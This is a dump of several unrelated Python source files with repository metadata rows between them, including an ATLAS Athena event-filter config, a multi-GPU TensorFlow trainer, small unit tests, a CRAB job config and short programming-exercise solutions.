ByteStreamInputSvc.FullFileName += ["/u/at/ahaas/nfs2/temp/minbias/data10_7TeV.00152845.physics_RNDM.merge.RAW/data10_7TeV.00152845.physics_RNDM.merge.RAW._lb0200._0001.1","/u/at/ahaas/nfs2/temp/minbias/data10_7TeV.00152845.physics_RNDM.merge.RAW/data10_7TeV.00152845.physics_RNDM.merge.RAW._lb0201._0001.1"]
#ByteStreamInputSvc.ValidateEvent=False
#ByteStreamInputSvc.DumpFlag = True
#ByteStreamInputSvc.SkipNeventBeforeNext=10
print ByteStreamInputSvc
from AthenaCommon.AlgSequence import AlgSequence
topSequence = AlgSequence()
# get the filter algortihm
from TrigT1ResultByteStream.TrigT1ResultByteStreamConf import CTPByteStreamTool,RecCTPByteStreamTool
if not hasattr( svcMgr, "ByteStreamAddressProviderSvc" ):
from ByteStreamCnvSvcBase.ByteStreamCnvSvcBaseConf import ByteStreamAddressProviderSvc
svcMgr += ByteStreamAddressProviderSvc()
svcMgr.ByteStreamAddressProviderSvc.TypeNames += [
"ROIB::RoIBResult/RoIBResult",
"MuCTPI_RDO/MUCTPI_RDO",
"CTP_RDO/CTP_RDO",
"MuCTPI_RIO/MUCTPI_RIO",
"CTP_RIO/CTP_RIO"
]
from OverlayCommonAlgs.OverlayCommonAlgsConf import BSFilter
filAlg=BSFilter("BSFilter")
filAlg.TriggerBit=63 # The trigger bit to select
topSequence+=filAlg
# BS OutputStream Tool
OutStreamName="OutputStreamBSCopy"
from ByteStreamCnvSvc.ByteStreamCnvSvcConf import ByteStreamEventStorageOutputSvc,ByteStreamOutputStreamCopyTool
bsCopyTool = ByteStreamOutputStreamCopyTool("OutputStreamBSCopyTool")
svcMgr.ToolSvc += bsCopyTool
# Service to write out BS events
bsOutputSvc=ByteStreamEventStorageOutputSvc("BSESOutputSvc0",OutputDirectory="temp/",SimpleFileName="SelectedBSEvents")
svcMgr += bsOutputSvc
bsCopyTool.ByteStreamOutputSvc=bsOutputSvc
bsCopyTool.ByteStreamInputSvc=svcMgr.ByteStreamInputSvc
# create AthenaOutputStream for BS Copy
from AthenaServices.AthenaServicesConf import AthenaOutputStream
OutputStreamBSCopy = AthenaOutputStream( OutStreamName, WritingTool=bsCopyTool )
topSequence += OutputStreamBSCopy
OutputStreamBSCopy.AcceptAlgs =["BSFilter"]
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
5178891a024ece70b7e141b46dcf6e10125719ca | ee721fac058d6c0472be24f95e3cc8df37f4198d | /Stack/letter.py | 886078dbf96d36aae384663781528a0a8f35af6d | [] | no_license | Horlawhumy-dev/Python_DataStructures | 51af03dcbed86a51009c13657b17584f09d0a40d | c5aad1fe6c6566414c76711a0871abf9529fe04f | refs/heads/master | 2023-06-04T09:32:34.776313 | 2021-07-02T21:43:09 | 2021-07-02T21:43:09 | 377,631,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 611 | py | # Letter Frequency
import math
# You are making a program to analyze text.
# Take the text as the first input and a letter as the second input, and output the frequency of that letter in the text as a whole percentage.
# Sample Input:
# hello
# l
# Sample Output:
# 40
# The letter l appears 2 times in the text hello, which has 5 letters. So, the frequency would be (2/5)*100 = 40
#your code goes here
text = input("Enter your sample text: ")
letter = input("Enter the letter to be counted: ")
if letter in text:
result = text.count(letter) / len(text) * 100
print(str(math.floor(result)) + '%') | [
"harof.dev@gmail.com"
] | harof.dev@gmail.com |
ab6c198286931579386d1847dbaec01086aabc5d | 7f66c9818b2a22e6dbfa832a6bb4f9f21fbd15da | /semester_1/fp/assignment_06-08/src/tests/test_services.py | 1bab656276fba77c296f87c0febc5cf5ee2ed7da | [] | no_license | caprapaul/assignments | cc3992833d4f23f74286c1800ac38dc2d9a874da | 206b049700d8a3e03b52e57960cd44f85c415fe8 | refs/heads/master | 2023-05-24T03:46:42.858147 | 2022-05-03T16:26:58 | 2022-05-03T16:26:58 | 248,552,522 | 0 | 0 | null | 2023-05-09T01:49:04 | 2020-03-19T16:31:37 | C | UTF-8 | Python | false | false | 2,911 | py | import unittest
import coverage
from repository import Repository
from services.activity_service import ActivityService, Activity
from services.person_service import PersonService, Person
from data.activity_data import *
from data.person_data import *
from cmdsys.cmdsys import CommandSystem
class TestServices(unittest.TestCase):
def test_activity_service(self):
a_repo = Repository()
p_repo = Repository()
p_repo.add_item(Person('1', get_random_name(), get_random_phone_number()), get_uid=lambda p: p.uid)
p_repo.add_item(Person('2', get_random_name(), get_random_phone_number()), get_uid=lambda p: p.uid)
p_repo.add_item(Person('3', get_random_name(), get_random_phone_number()), get_uid=lambda p: p.uid)
service = ActivityService(a_repo, p_repo)
activity1 = Activity('1234', ['1', '2'], get_random_date(), get_random_time(), 'test1')
activity2 = Activity('4321', ['1', '3'], get_random_date(), get_random_time(), 'test2')
service.add_activity(activity1)
self.assertEqual(service.get_activities(), [activity1])
service.add_activity(activity2)
self.assertEqual(service.get_activities(), [activity1, activity2])
self.assertEqual(service.get_activity(activity1.uid), activity1)
service.remove_activity(activity2.uid)
self.assertEqual(service.get_activities(), [activity1])
CommandSystem.global_undo()
self.assertEqual(service.get_activities(), [activity1, activity2])
CommandSystem.global_redo()
self.assertEqual(service.get_activities(), [activity1])
CommandSystem.global_undo()
new_activity = Activity(activity2.uid, ['1'], activity2.date, activity2.time, activity2.description)
service.update_activity(activity2.uid, new_activity)
self.assertEqual(service.get_activities(), [activity1, new_activity])
self.assertEqual(service.get_date_activities(activity1.date), [activity1])
self.assertEqual(service.get_busiest_days(), [(activity1.date, 1), (new_activity.date, 1)])
self.assertEqual(service.get_person_activities('2'), [activity1])
self.assertEqual(service.search_activities(None, None, 'test1'), [activity1])
def test_person_service(self):
a_repo = Repository()
p_repo = Repository()
service = PersonService(p_repo, a_repo)
person1 = Person('1', get_random_name(), get_random_phone_number())
person2 = Person('2', get_random_name(), get_random_phone_number())
service.add_person(person1)
self.assertEqual(service.get_persons(), [person1])
service.add_person(person2)
self.assertEqual(service.get_persons(), [person1, person2])
if __name__ == '__main__':
cov = coverage.Coverage()
cov.start()
unittest.main()
cov.stop()
cov.save()
cov.html_report(directory='covhtml')
| [
"c.paulica@gmail.com"
] | c.paulica@gmail.com |
c4afeca91e73abf6bbd3d9882cfda15357dfd482 | 6136be1772619e92d93d474838b2d9b55071e423 | /testPickler.py | 26ce40b9bde70e0ee9189bcf0f1e7cba8a784ccd | [] | no_license | Anwesh43/python-url-requests | 1aa5314ab1c362db869fbca44605d2631bde17d2 | f26ff5c83beadc3442ae087a47f18553af78c890 | refs/heads/master | 2020-05-15T11:03:44.616768 | 2019-04-19T13:11:46 | 2019-04-19T13:11:46 | 182,210,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | from picklerutil import *
dict1 = loadFromFile('a.pickle')
assert dict1 == {}
dict2 = {}
dict2["a"] = 1
dict2["b"] = 2
saveToFile('a.pkl', dict2)
dict3 = loadFromFile('a.pkl')
assert dict3 == dict2
| [
"anweshthecool0@gmail.com"
] | anweshthecool0@gmail.com |
994deee1e02643256d13d5a378b1b4a3011135f6 | 1afb1fbfeb696a96a7e3cddfe4c74192c770b97d | /trainer.py | 1cb656a38f31ce48a8b43f2a0626505c97134674 | [
"Apache-2.0"
] | permissive | Guanwh/Object_Detection_Tracking | b74dc8c3c1dc9ede06b1d9c36d2e80e5af28bc6f | af7f840915f63ae498c8241e5832a4bf4aabfcc1 | refs/heads/master | 2020-06-03T21:57:43.644703 | 2019-06-10T05:00:14 | 2019-06-10T05:00:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,667 | py | # coding=utf-8
# trainer class, given the model (model has the function to get_loss())
import tensorflow as tf
import sys
from models import assign_to_device
def average_gradients(tower_grads, sum_grads=False):
    """Merge per-tower gradients for variables shared across devices.

    tower_grads -- list with one entry per device; each entry is a list of
    (gradient, variable) pairs covering the same variables in the same order.
    Returns one (gradient, variable) pair per shared variable: the summed
    gradient when ``sum_grads`` is true, otherwise the mean over towers.
    The variable object is taken from the first tower, since the variables
    are shared and therefore redundant across towers.  Acts as a
    synchronization point across all towers.
    """
    n_towers = len(tower_grads)
    merged = []
    # zip(*...) regroups the data per-variable instead of per-device:
    # each grads_and_vars is ((g_gpu0, v_gpu0), ..., (g_gpuN, v_gpuN)).
    for grads_and_vars in zip(*tower_grads):
        per_tower = [g for g, _ in grads_and_vars]
        combined = tf.add_n(per_tower)
        if not sum_grads:
            combined = tf.multiply(combined, 1.0 / n_towers)
        shared_var = grads_and_vars[0][1]
        merged.append((combined, shared_var))
    return merged
class Trainer():
    """Multi-GPU trainer: builds the optimizer, per-tower gradients and the
    combined train op for a list of model replicas, and runs training steps.
    Python 2 code (print statements, xrange); models must expose the loss
    tensors referenced below.
    """
    def __init__(self,models,config):
        """Build optimizer, LR schedule and the gradient-averaging train op.

        models -- one model replica per GPU, each with its own gpuid/losses.
        config -- hyper-parameter namespace (lr, optimizer, schedules, ...).
        """
        self.config = config
        self.models = models
        self.global_step = models[0].global_step #
        learning_rate = config.init_lr
        if config.use_lr_decay:
            # always use warmup, set step to zero to disable
            warm_up_start = config.init_lr * 0.33
            # linear increasing from 0.33*lr to lr in warm_up_steps
            warm_up_lr = tf.train.polynomial_decay(
                warm_up_start,
                self.global_step,
                config.warm_up_steps,
                config.init_lr,
                power=1.0,
            )
            if config.use_cosine_schedule:
                # cosine decay runs over the steps remaining after
                # warm-up and the constant-lr phase
                max_steps = int(config.train_num_examples / config.im_batch_size * config.num_epochs)
                schedule_lr = tf.train.cosine_decay(
                    config.init_lr,
                    self.global_step - config.warm_up_steps - config.same_lr_steps,
                    max_steps - config.warm_up_steps - config.same_lr_steps,
                    alpha=0.0
                )
            else:
                # staircase exponential decay every num_epoch_per_decay epochs
                decay_steps = int(config.train_num_examples / config.im_batch_size * config.num_epoch_per_decay)
                schedule_lr = tf.train.exponential_decay(
                    config.init_lr,
                    self.global_step,
                    decay_steps,
                    config.learning_rate_decay,
                    staircase=True
                )
            # piecewise: warm-up lr, then constant init_lr, then the schedule
            boundaries = [config.warm_up_steps, config.warm_up_steps + config.same_lr_steps] # before reaching warm_up steps, use the warm up learning rate.
            values = [warm_up_lr, config.init_lr, schedule_lr]
            learning_rate = tf.train.piecewise_constant(self.global_step, boundaries, values)
            print "learning rate warm up lr from %s to %s in %s steps, then keep for %s steps, then schedule learning rate decay" % (warm_up_start, config.init_lr, config.warm_up_steps, config.same_lr_steps)
            self.learning_rate = learning_rate
        else:
            self.learning_rate = None
        # select the optimizer named in the config; abort on unknown names
        if config.optimizer == 'adadelta':
            self.opt = tf.train.AdadeltaOptimizer(learning_rate)
        elif config.optimizer == "adam":
            self.opt = tf.train.AdamOptimizer(learning_rate)
        elif config.optimizer == "sgd":
            self.opt = tf.train.GradientDescentOptimizer(learning_rate)
        elif config.optimizer == "momentum":
            self.opt = tf.train.MomentumOptimizer(learning_rate, momentum=config.momentum)
        else:
            print "optimizer not implemented"
            sys.exit()
        # keep per-model loss tensors so step() can fetch them individually
        self.rpn_label_losses = [model.rpn_label_loss for model in models]
        self.rpn_box_losses = [model.rpn_box_loss for model in models]
        self.fastrcnn_label_losses = [model.fastrcnn_label_loss for model in models]
        self.fastrcnn_box_losses = [model.fastrcnn_box_loss for model in models]
        if config.wd is not None:
            # weight-decay terms, one per model
            self.wd = [model.wd for model in models]
        if config.use_small_object_head:
            self.so_label_losses = [model.so_label_loss for model in models]
        if config.add_act:
            self.act_losses = [model.act_losses for model in self.models]
        self.losses = []
        self.grads = []
        for model in self.models:
            gpuid = model.gpuid
            # compute gradients on each gpu devices
            with tf.device(assign_to_device("/gpu:%s"%(gpuid), config.controller)):
                self.losses.append(model.loss)
                grad = self.opt.compute_gradients(model.loss)
                grad = [(g,var) for g, var in grad if g is not None] # we freeze resnet, so there will be none gradient
                # whehter to clip gradient
                if config.clip_gradient_norm is not None:
                    grad = [(tf.clip_by_value(g, -1*config.clip_gradient_norm, config.clip_gradient_norm), var) for g, var in grad]
                self.grads.append(grad)
        # apply gradient on the controlling device
        with tf.device(config.controller):
            avg_loss = tf.reduce_mean(self.losses)
            # NOTE: gradients are summed (not averaged) across towers here
            avg_grads = average_gradients(self.grads,sum_grads=True)
            self.train_op = self.opt.apply_gradients(avg_grads,global_step=self.global_step)
            self.loss = avg_loss

    def step(self,sess,batch,get_summary=False):
        """Run one training step; get_summary is currently unused.

        batch -- (batchIdx, batch_datas), one batch_data per model replica.
        Returns (loss, wd, rpn_label_losses, rpn_box_losses,
        fastrcnn_label_losses, fastrcnn_box_losses, so_label_losses,
        act_losses, learning_rate); per-model lists use -1 placeholders for
        disabled loss kinds.
        """
        assert isinstance(sess,tf.Session)
        config = self.config
        # idxs is a tuple (23,123,33..) index for sample
        batchIdx,batch_datas = batch
        #assert len(batch_datas) == len(self.models) # there may be less data in the end
        feed_dict = {}
        for batch_data, model in zip(batch_datas, self.models): # if batch is smaller so will the input?
            feed_dict.update(model.get_feed_dict(batch_data,is_train=True))
        # fetch order: total loss, then per-model loss groups, then train_op + lr
        sess_input = []
        sess_input.append(self.loss)
        for i in xrange(len(self.models)):
            sess_input.append(self.rpn_label_losses[i])
            sess_input.append(self.rpn_box_losses[i])
            sess_input.append(self.fastrcnn_label_losses[i])
            sess_input.append(self.fastrcnn_box_losses[i])
            if config.wd is not None:
                sess_input.append(self.wd[i])
            if config.use_small_object_head:
                sess_input.append(self.so_label_losses[i])
            if config.add_act:
                sess_input.append(self.act_losses[i])
        sess_input.append(self.train_op)
        sess_input.append(self.learning_rate)
        outs = sess.run(sess_input,feed_dict=feed_dict)
        loss = outs[0]
        # stride between same-kind losses of consecutive models
        # NOTE(review): skip does not include config.wd, unlike the append
        # loop above -- if config.wd is not None the strided slices below
        # look misaligned; verify against how wd is configured in practice.
        skip = 4 + int(config.add_act) + int(config.use_small_object_head)
        rpn_label_losses = outs[1::skip][:len(self.models)]
        rpn_box_losses = outs[2::skip][:len(self.models)]
        fastrcnn_label_losses = outs[3::skip][:len(self.models)]
        fastrcnn_box_losses = outs[4::skip][:len(self.models)]
        now = 4
        # optional loss kinds default to -1 placeholders per model
        wd = [-1 for m in self.models]
        if config.wd is not None:
            now+=1
            wd = outs[now::skip][:len(self.models)]
        so_label_losses = [-1 for m in self.models]
        if config.use_small_object_head:
            now+=1
            so_label_losses = outs[now::skip][:len(self.models)]
        act_losses = [-1 for m in self.models]
        if config.add_act:
            now+=1
            act_losses = outs[now::skip][:len(self.models)]
        """
        if config.add_act:
            out = [self.loss, self.rpn_label_loss, self.rpn_box_loss, self.fastrcnn_label_loss, self.fastrcnn_box_loss, self.train_op]
            act_losses_pl = [model.act_losses for model in self.models]
            out = act_losses_pl + out
            things = sess.run(out,feed_dict=feed_dict)
            act_losses = things[:len(act_losses_pl)]
            loss,rpn_label_loss, rpn_box_loss, fastrcnn_label_loss, fastrcnn_box_loss, train_op = things[len(act_losses_pl):]
        else:
            loss,rpn_label_loss, rpn_box_loss, fastrcnn_label_loss, fastrcnn_box_loss, train_op = sess.run([self.loss,self.rpn_label_loss, self.rpn_box_loss, self.fastrcnn_label_loss, self.fastrcnn_box_loss,self.train_op],feed_dict=feed_dict)
            act_losses = None
        """
        learning_rate = outs[-1]
        return loss, wd, rpn_label_losses, rpn_box_losses, fastrcnn_label_losses, fastrcnn_box_losses, so_label_losses, act_losses, learning_rate
| [
"junweil@cs.cmu.edu"
] | junweil@cs.cmu.edu |
e819a2b88a14f5ede5bdc9836a8c201e69a8ee48 | ff5eea95bb0827cb086c32f4ec1c174b28e5b82d | /gammapy/astro/__init__.py | 015054cb8f5eec0b26a1bd245e06b6d7a5f3664f | [] | no_license | pflaumenmus/gammapy | 4830cc5506a4052658f30077fa4e11d8c685ede0 | 7b5caf832c9950c886528ca107203ce9b83c7ebf | refs/heads/master | 2021-01-15T23:27:46.521337 | 2013-09-25T14:23:35 | 2013-09-25T14:23:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Astrophysical source and population models
"""
from .pulsar import *
from .pwn import *
from .snr import *
| [
"Deil.Christoph@gmail.com"
] | Deil.Christoph@gmail.com |
6fd0477a22c33b117b42125a6e057df913881c55 | 48f73b5b78da81c388d76d685ec47bb6387eefdd | /scrapeHackerrankCode/codes/cats-and-a-mouse.py | ca00be6a7e4c1e023ad75c17f954266b7f54f1c9 | [] | no_license | abidkhan484/hacerrankScraping | ad0ceda6c86d321d98768b169d63ea1ee7ccd861 | 487bbf115117bd5c293298e77f15ae810a50b82d | refs/heads/master | 2021-09-18T19:27:52.173164 | 2018-07-18T12:12:51 | 2018-07-18T12:12:51 | 111,005,462 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 456 | py | # Accepted
# Python 3
#!/bin/python3
import sys
q = int(input().strip())
for a0 in range(q):
x,y,z = input().strip().split(' ')
x,y,z = [int(x),int(y),int(z)]
#position of cat A to mouse is c1
c1 = x-z
if (c1<0):
c1 = -c1
#position of cat B to mouse is c2
c2 = y-z
if (c2<0):
c2 = -c2
if (c1>c2):
print("Cat B")
elif (c2>c1):
print("Cat A")
else:
print("Mouse C")
| [
"abidkhan484@gmail.com"
] | abidkhan484@gmail.com |
93e48303735a8b4f1377af9f4955cdd1ce80e27e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03352/s380195250.py | c8f616bc533e0145002aa7156f98f0a57f0f9297 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | import math
# Largest perfect power b**p (p >= 2) not exceeding X.
# Rewritten with exact integer arithmetic: the original compared
# log10(i)/log10(j) against an integer, which is fragile floating-point
# logic, counted i == j (ratio exactly 1.0) as a "power", and used the
# range range(2, int((X+1)/2)), which is empty for X <= 4 -- so X == 4
# wrongly printed 1 instead of 4.
X = int(input())
best = 1  # 1 == 1**2 is always a valid perfect power
b = 2
while b * b <= X:
    power = b * b
    while power <= X:
        best = max(best, power)
        power *= b
    b += 1
print(best)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
9bda41dd7233be94e1d43c731d04583cd8d9da2a | 717fbff92a7998660dc572666b045500cf028dff | /CRAB_SUBMISSION/Pt_100_withoutPU/crab_reco_50_2ndfull_2nd.py | bf11bc0b4fd441667be79fcaae38767ecf6f3ac8 | [] | no_license | neharawal14/muon_gun_project | 20c84874c14b75cb5fed4e9b7958927f6ddaf9f9 | efccbc36c4d511f1b8dafed8292604331b7b38ae | refs/heads/main | 2023-08-22T15:24:21.255977 | 2021-09-22T17:46:25 | 2021-09-22T17:46:25 | 409,301,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config
config = config()
config.General.requestName = 'SingleMuPt50_2ndfull_2nd_large_step3'
config.General.workArea = 'crab_projects_pt50_2ndfull_2nd'
config.General.transferOutputs = True
config.General.failureLimit=1
config.General.transferLogs=True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'SingleMuPt50_2ndfull_2nd_GEN_DIGI_L1_RAW2DIGI_RECO.py'
#config.Data.outputPrimaryDataset = 'MinBias'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 1
#NJOBS = 2000 # This is not a configuration parameter, but an auxiliary variable that we use in the next line.
#config.Data.totalUnits = config.Data.unitsPerJob * NJOBS
config.Data.publication = True
#config.Data.outputDatasetTag = 'ZMuMu_step2'
#config.Data.outputPrimaryDataset = 'ZMuMu_step2_ferrico'
config.Data.inputDataset = '/SingleMuPt50_2ndfull_2nd_large_GEN-SIM_step1_neha/nrawal-crab_SingleMuPt50_2ndfull_2nd_large_step2-b92895268740895c325a8071b664b5b5/USER'
#config.Data.inputDataset = '/ZMuMu_GEN-SIM_step1_ferrico/ferrico-ZMuMu_GEN-SIM_step1-9eadee95878022f078e16d6b70fe376c/USER'
config.Data.inputDBS = 'phys03'
config.Site.storageSite = 'T2_US_Florida'
| [
"nrawal@lxplus.cern.ch"
] | nrawal@lxplus.cern.ch |
5d7cc648684a2ad43296c9188ed9c4fca05f8fcb | 9252a2c661404e596bb81474ae56ff836ad21eb4 | /Python/10_Error_Exception/try.py | 7343bc785aca8afd741cf2211edbec66c523ebe8 | [] | no_license | yang75n/programming-language-guide | 242c6d094e114240a7d0650ed12b7dc8b074a5e4 | 0c6ff76c859f1283ee39a547bb81bb9236d4a303 | refs/heads/master | 2021-06-29T16:38:01.535856 | 2021-03-05T07:32:08 | 2021-03-05T07:32:08 | 223,430,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | while True:
try:
x = int(input("请输入一个数字: "))
break
except ValueError:
print("您输入的不是数字,请再次尝试输入!")
| [
"you@example.com"
] | you@example.com |
36312377ff350c3df7aded430feadb6bc3f2a9fd | c163ffbec8ed657adb4e6633373492a6166c39cd | /substanced/sdi/views/indexing.py | dc67ae430b609340ab45c102b18a28ef127fd154 | [
"BSD-3-Clause-Modification"
] | permissive | reebalazs/substanced | b085d92a725efff45f430d6a2513573a86005a5b | 921ae5abfc6b04d009a55ed3405563589cddc88c | refs/heads/master | 2021-01-15T22:41:50.581066 | 2012-11-20T14:02:21 | 2012-11-20T14:02:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,914 | py | from pyramid.view import view_defaults
from pyramid.httpexceptions import HTTPFound
from pyramid.session import check_csrf_token
from ...catalog import (
catalog_view_factory_for,
CatalogViewWrapper,
)
from ...content import find_services
from ...util import oid_of
from .. import (
mgmt_view,
MIDDLE
)
@view_defaults(
    catalogable=True,
    name='indexing',
    permission='sdi.manage-catalog',
    )
class IndexingView(object):
    """SDI management views for inspecting and refreshing how an object is
    indexed: ``show`` renders per-catalog index values for the context,
    ``reindex`` re-indexes the context in every reachable catalog service.
    """
    # staticmethod wrapper so tests can substitute the factory lookup
    catalog_view_factory_for = staticmethod(catalog_view_factory_for) # testing

    def __init__(self, context, request):
        self.context = context
        self.request = request

    @mgmt_view(
        renderer='templates/indexing.pt',
        tab_title='Indexing',
        tab_after=MIDDLE, # try not to be the default tab, we're too obscure
        )
    def show(self):
        """Collect each index's stored representation of this object, per catalog."""
        oid = oid_of(self.context)
        catalogs = []
        for catalog in find_services(self.context, 'catalog'):
            indexes = []
            catalogs.append((catalog, indexes))
            for index in catalog.values():
                # '(not indexed)' is the fallback text when the index holds
                # nothing for this oid
                docrepr = index.document_repr(oid, '(not indexed)')
                indexes.append({'index':index, 'value':docrepr})
        return {'catalogs':catalogs}

    @mgmt_view(request_method='POST', tab_title=None)
    def reindex(self):
        """POST handler: re-index the context object in all catalog services."""
        context = self.context
        request = self.request
        check_csrf_token(request)
        oid = oid_of(self.context)
        catalog_view_factory = self.catalog_view_factory_for(
            context, request.registry)
        if catalog_view_factory:
            wrapper = CatalogViewWrapper(context, catalog_view_factory)
            for catalog in find_services(context, 'catalog'):
                catalog.reindex_doc(oid, wrapper)
            request.flash_with_undo('Object reindexed', 'success')
        # always redirect back to the Indexing tab
        return HTTPFound(request.mgmt_url(self.context, '@@indexing'))
"chrism@plope.com"
] | chrism@plope.com |
5803bce5c8dd22cf1776e2fcc7389efe58b99768 | 6ffc81125d6bb5f8476f95b2334a27807b8290de | /tests/test_parse.py | 1e7a4e1614041fc569252d27d69c2636434b2ced | [
"BSD-2-Clause",
"Apache-2.0"
] | permissive | oaqa/FlexNeuART | 4cb341ca3c3f94fa28a7cfd4aef5451de3a4a2cb | 0bd3e06735ff705731fb6cee62d3486276beccdf | refs/heads/master | 2023-09-01T00:19:33.980081 | 2023-05-26T19:19:30 | 2023-05-26T19:19:30 | 64,071,121 | 156 | 21 | Apache-2.0 | 2023-09-10T01:27:05 | 2016-07-24T15:08:03 | Java | UTF-8 | Python | false | false | 665 | py | #!/usr/bin/env python
import unittest
from flexneuart.text_proc.parse import KrovetzStemParser
class TestKrovetzStemParser(unittest.TestCase):
    """Basic functional checks for flexneuart's KrovetzStemParser."""

    # The original method was named ``basic_tests``: without the ``test``
    # prefix, unittest discovery silently never ran it.  Renamed so it
    # executes; the old name is kept as an alias for external callers.
    def test_basic(self):
        """Output is lower-cased, stop words ('is', 'a') are dropped,
        'tests'/'teStEd' stem to 'test', and '-'/'#' act as separators."""
        parser = KrovetzStemParser(['is', 'a'])
        self.assertEqual(parser('This IS a simplest tests'), 'this simplest test')
        self.assertEqual(parser('This IS a simplest teStEd'), 'this simplest test')
        self.assertEqual(parser('This IS a simplest-teStEd'), 'this simplest test')
        self.assertEqual(parser('This IS a simplest#teStEd'), 'this simplest test')

    basic_tests = test_basic  # backward-compatible alias


if __name__ == "__main__":
    unittest.main()
| [
"leo@boytsov.info"
] | leo@boytsov.info |
937b9f9d39c95c4381e0d93c2397840ab7af652a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02987/s818435683.py | 7cfe08a62edfc1ca0bfee4cf0d5452b18db63878 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | s = input().split()
b = list(s[0][0] + s[0][1] + s[0][2] + s[0][3])
sset = set(b)
if len(sset) == 2:
print('Yes')
else:
print('No') | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
841cdbbcc333c4a305e51582f43857977b301cf7 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_6665.py | 5372da5606559fecb37e86171cac99324584bf4c | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | # TypeError in Django
url(r'^koszyk/$', 'app_name.views.koszyk', name="sklep_koszyk"),
url(r'^koszyk/dodaj/(\d+)/$', 'app_name.views.koszyk_dodaj', name="sklep_koszyk_dodaj"),
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
b99317af4560c6df672ceda2c1599ab07f34961c | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2/cachitas/revenge_of_the_pancakes.py | c86f379820b17e6d7b83f5e4d4a37df87be2c178 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,883 | py | import logging
log = logging.getLogger(__name__)
def prepare_pancakes(pancakes_pile):
log.info('Pancakes pile: %s' % pancakes_pile)
maneuvers = 0
n = len(pancakes_pile)
ideal_pile = '+' * n
while pancakes_pile != ideal_pile:
log.debug('Pancake pile is not ready to serve: %s' % pancakes_pile)
# Lookup pankace pile from the bottom
for i, pancake in enumerate(pancakes_pile[::-1]):
if pancake == '-':
lowest_incorrect_pancake = n - i - 1
log.debug('Lowest incorrect pancake index: %d'
% lowest_incorrect_pancake)
break
else:
log.info('Serving pancakes. It required %d maneuvers' % maneuvers)
return maneuvers
pancakes_pile = _flip_top_pancakes(
pancakes_pile, lowest_incorrect_pancake)
maneuvers += 1
log.info('Serving pancakes. It required %d maneuvers' % maneuvers)
return maneuvers
def _flip_top_pancakes(pancakes_pile, n):
top_stack, rest = pancakes_pile[:n+1], pancakes_pile[n+1:]
log.debug('Flipping first pancakes [%s](%s)' % (top_stack, rest))
stack_flipped = [_flip(pancake) for pancake in top_stack]
stack_after_maneuver = ''.join(stack_flipped)
pancakes_pile = stack_after_maneuver + pancakes_pile[n+1:]
log.debug('Flipping result: %s' % pancakes_pile)
return str(pancakes_pile)
def _flip(pancake):
if pancake == '+':
return '-'
elif pancake == '-':
return '+'
else:
raise ValueError(pancake)
if __name__ == '__main__':
logging.basicConfig(level='INFO')
T = int(input()) # read a line with a single integer (input size)
for i in range(1, T + 1):
log.info(50 * '-' + ' CASE {:>d}'.format(i))
S = input()
print("Case #{}: {}".format(i, prepare_pancakes(S)))
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
760704eb82954bce2f7199f574320a6724fcdf28 | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/age_sex_20190618093311.py | cca1d6257ba56a454e2c1c044dda556e97e0897c | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 867 | py | # -*- coding:utf-8 -*-
import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
